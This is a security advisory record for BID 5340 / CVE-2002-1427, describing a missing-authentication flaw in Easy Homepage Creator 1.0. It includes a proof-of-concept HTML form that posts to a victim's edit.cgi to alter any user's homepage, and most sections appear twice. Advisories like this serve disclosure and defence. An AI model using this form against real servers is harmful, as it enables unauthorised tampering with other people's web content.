Ben Chivers Easy Homepage Creator File Modification Vulnerability
BID:5340
Info
Ben Chivers Easy Homepage Creator File Modification Vulnerability
| Bugtraq ID: | 5340 |
| Class: | Design Error |
| CVE: |
CVE-2002-1427 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 29 2002 12:00AM |
| Updated: | Jul 11 2009 02:56PM |
| Credit: | Vulnerability credited to Arek Suroboyo <[email protected]>. |
| Vulnerable: |
Ben Chivers Homepage Creator 1.0 |
| Not Vulnerable: | |
Discussion
Ben Chivers Easy Homepage Creator File Modification Vulnerability
The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages.
The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages.
Exploit / POC
Ben Chivers Easy Homepage Creator File Modification Vulnerability
The following proof of concept was provided by Arek Suroboyo <[email protected]>:
<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>
The following proof of concept was provided by Arek Suroboyo <[email protected]>:
<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>
Solution / Fix
Ben Chivers Easy Homepage Creator File Modification Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Ben Chivers Easy Homepage Creator File Modification Vulnerability
References:
References:
- Easy Homepage Creator Vulnerability (Arek Suroboyo
) - Easyscripts Home Page (Ben Chivers)